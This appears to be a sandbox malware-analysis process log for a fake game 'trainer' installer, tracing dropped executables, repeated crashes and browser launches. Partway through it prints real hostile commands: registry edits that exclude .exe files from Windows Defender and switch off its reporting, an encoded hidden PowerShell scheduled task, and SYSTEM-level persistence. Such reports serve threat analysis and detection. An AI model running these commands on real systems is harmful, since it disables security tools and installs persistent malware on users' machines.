PID 2188 wrote to memory of 2116	2188	is-15UIA.tmp	CR_DBF.exe
PID 2188 wrote to memory of 2116	2188	is-15UIA.tmp	CR_DBF.exe
PID 2188 wrote to memory of 2116	2188	is-15UIA.tmp	CR_DBF.exe
PID 1688 wrote to memory of 1556	1688	net.exe	net1.exe
PID 1688 wrote to memory of 1556	1688	net.exe	net1.exe
PID 1688 wrote to memory of 1556	1688	net.exe	net1.exe
PID 2188 wrote to memory of 1772	2188	is-15UIA.tmp	net.exe
PID 2188 wrote to memory of 1772	2188	is-15UIA.tmp	net.exe
PID 2188 wrote to memory of 1772	2188	is-15UIA.tmp	net.exe
PID 2188 wrote to memory of 5028	2188	is-15UIA.tmp	CR_DBF.exe
PID 2188 wrote to memory of 5028	2188	is-15UIA.tmp	CR_DBF.exe
PID 2188 wrote to memory of 5028	2188	is-15UIA.tmp	CR_DBF.exe
PID 1772 wrote to memory of 4444	1772	net.exe	net1.exe
PID 1772 wrote to memory of 4444	1772	net.exe	net1.exe
PID 1772 wrote to memory of 4444	1772	net.exe	net1.exe
PID 5028 wrote to memory of 2152	5028	CR_DBF.exe	msedge.exe
PID 5028 wrote to memory of 2152	5028	CR_DBF.exe	msedge.exe
PID 2152 wrote to memory of 704	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 704	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 3892	2152	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\trainerv_pwba4pl5.exe
"C:\Users\Admin\AppData\Local\Temp\trainerv_pwba4pl5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Users\Admin\AppData\Local\Temp\is-30N4P.tmp\is-15UIA.tmp
"C:\Users\Admin\AppData\Local\Temp\is-30N4P.tmp\is-15UIA.tmp" /SL4 $5004A "C:\Users\Admin\AppData\Local\Temp\trainerv_pwba4pl5.exe" 3595442 51712
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 32
3⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 32
4⤵
PID:1556

C:\Program Files (x86)\CRDBH\CR_DBF.exe
"C:\Program Files (x86)\CRDBH\CR_DBF.exe"
3⤵
- Executes dropped EXE
PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 868
4⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 888
4⤵
- Program crash
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 140
4⤵
- Program crash
PID:3464

C:\Program Files (x86)\CRDBH\CR_DBF.exe
"C:\Program Files (x86)\CRDBH\CR_DBF.exe" 43399e6c5ed640259ccad2110c65d572
3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 852
4⤵
- Program crash
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 860
4⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 796
4⤵
- Program crash
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1052
4⤵
- Program crash
PID:516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1072
4⤵
- Program crash
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1108
4⤵
- Program crash
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1216
4⤵
- Program crash
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1224
4⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1308
4⤵
- Program crash
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1332
4⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 980
4⤵
- Program crash
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1484
4⤵
- Program crash
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 904
4⤵
- Program crash
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1488
4⤵
- Program crash
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1356
4⤵
- Program crash
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1356
4⤵
- Program crash
PID:368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2044
4⤵
- Program crash
PID:3516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://setupservice.xyz/eyJ0eXBlIjoxLCJ0Ijo4OTgzMDQ0NDAwNjMzMiwibmFtZSI6InRyYWluZXIudi4xLjAuemlwIiwic2lkIjoiMjYwODIyMTkifQ==
4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff4a9746f8,0x7fff4a974708,0x7fff4a974718
5⤵
PID:704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
5⤵
PID:3892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
5⤵
PID:4232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
5⤵
PID:1232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
5⤵
PID:392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
5⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
5⤵
PID:2320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 /prefetch:8
5⤵
PID:4136

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:1144

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7d7f35460,0x7ff7d7f35470,0x7ff7d7f35480
6⤵
PID:3012

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
5⤵
PID:4996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
5⤵
PID:4856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
5⤵
PID:440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11626007997259514774,4185948360180359253,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
5⤵
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1800
4⤵
- Program crash
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 840
4⤵
- Program crash
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1840
4⤵
- Program crash
PID:1336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1824
4⤵
- Program crash
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1360
4⤵
- Program crash
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1868
4⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1864
4⤵
- Program crash
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1988
4⤵
- Program crash
PID:1336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1872
4⤵
- Program crash
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2100
4⤵
- Program crash
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1872
4⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2056
4⤵
- Program crash
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2160
4⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2144
4⤵
- Program crash
PID:5152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2200
4⤵
- Program crash
PID:5368

C:\Users\Admin\AppData\Local\Temp\7BrO3CQ2\bhi1y.exe
C:\Users\Admin\AppData\Local\Temp\7BrO3CQ2\bhi1y.exe /VERYSILENT
4⤵
- Executes dropped EXE
PID:5504

C:\Users\Admin\AppData\Local\Temp\is-CE4SA.tmp\is-L2I1N.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CE4SA.tmp\is-L2I1N.tmp" /SL4 $11022C "C:\Users\Admin\AppData\Local\Temp\7BrO3CQ2\bhi1y.exe" 2078695 52736 /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5716

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 10
6⤵
PID:6124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 10
7⤵
PID:5256

C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe
"C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe" install
6⤵
PID:3912

C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe
"C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe" start
6⤵
- Executes dropped EXE
PID:5276

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause Erkalo46
6⤵
PID:5164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause Erkalo46
7⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\fphuXjyc\0OQUu7uBX.exe
C:\Users\Admin\AppData\Local\Temp\fphuXjyc\0OQUu7uBX.exe /S /site_id=690689
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:5532

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:5300

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:5376

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:2668

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:5184

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:3640

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:440

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:5428

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvWHHYdEb" /SC once /ST 01:54:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:3768

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvWHHYdEb"
5⤵
PID:5072

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvWHHYdEb"
5⤵
PID:5992

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWSvWqekZvxvfHIhZZ" /SC once /ST 03:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ihxsYbJcjJsUJBARi\QuPsafdaRiDniKs\cHHeNEL.exe\" bt /site_id 690689 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2160
4⤵
- Program crash
PID:5524

C:\Users\Admin\AppData\Local\Temp\LK81lwif\nynNd5ZQzG6UHaEmad6b.exe
C:\Users\Admin\AppData\Local\Temp\LK81lwif\nynNd5ZQzG6UHaEmad6b.exe /m SUB=43399e6c5ed640259ccad2110c65d572
4⤵
- Executes dropped EXE
PID:5700

C:\Users\Admin\AppData\Local\Temp\is-TDM0M.tmp\is-BHD94.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TDM0M.tmp\is-BHD94.tmp" /SL4 $1028E "C:\Users\Admin\AppData\Local\Temp\LK81lwif\nynNd5ZQzG6UHaEmad6b.exe" 1511809 56320 /m SUB=43399e6c5ed640259ccad2110c65d572
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5900

C:\Users\Admin\AppData\Local\Temp\is-IQGU6.tmp\FileDate49\FileDate49.exe
"C:\Users\Admin\AppData\Local\Temp\is-IQGU6.tmp\FileDate49\FileDate49.exe" /m SUB=43399e6c5ed640259ccad2110c65d572
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:6136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate49.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-IQGU6.tmp\FileDate49\FileDate49.exe" & exit
7⤵
- Executes dropped EXE
PID:3912

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FileDate49.exe" /f
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 28
6⤵
PID:6112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 28
7⤵
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2140
4⤵
- Program crash
PID:5732

C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe
C:\Users\Admin\AppData\Local\Temp\rtmWSP8L\FLj9ojoBE3.exe /sid=9 /pid=449 /lid=43399e6c5ed640259ccad2110c65d572
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:5004

C:\Users\Admin\AppData\Roaming\toc\wGra.exe
C:\Users\Admin\AppData\Roaming\toc\wGra.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Users\Admin\AppData\Roaming\toc\m0R62.exe
"C:\Users\Admin\AppData\Roaming\toc\m0R62.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe
"C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe" --port=52937
7⤵
- Executes dropped EXE
PID:4992

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --allow-pre-commit-input --check-for-update-interval=1800 --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --lang=de --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=9631 --start-maximized --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:57.0) Gecko/20100101 Firefox/57.0" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\\toc6527145e-5df4-4cdd-92eb-67332204e16c"
8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6088

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\toc6527145e-5df4-4cdd-92eb-67332204e16c /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\toc6527145e-5df4-4cdd-92eb-67332204e16c\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=102.0.5005.63 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x71ff8518,0x71ff8528,0x71ff8534
9⤵
- Executes dropped EXE
PID:5788

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
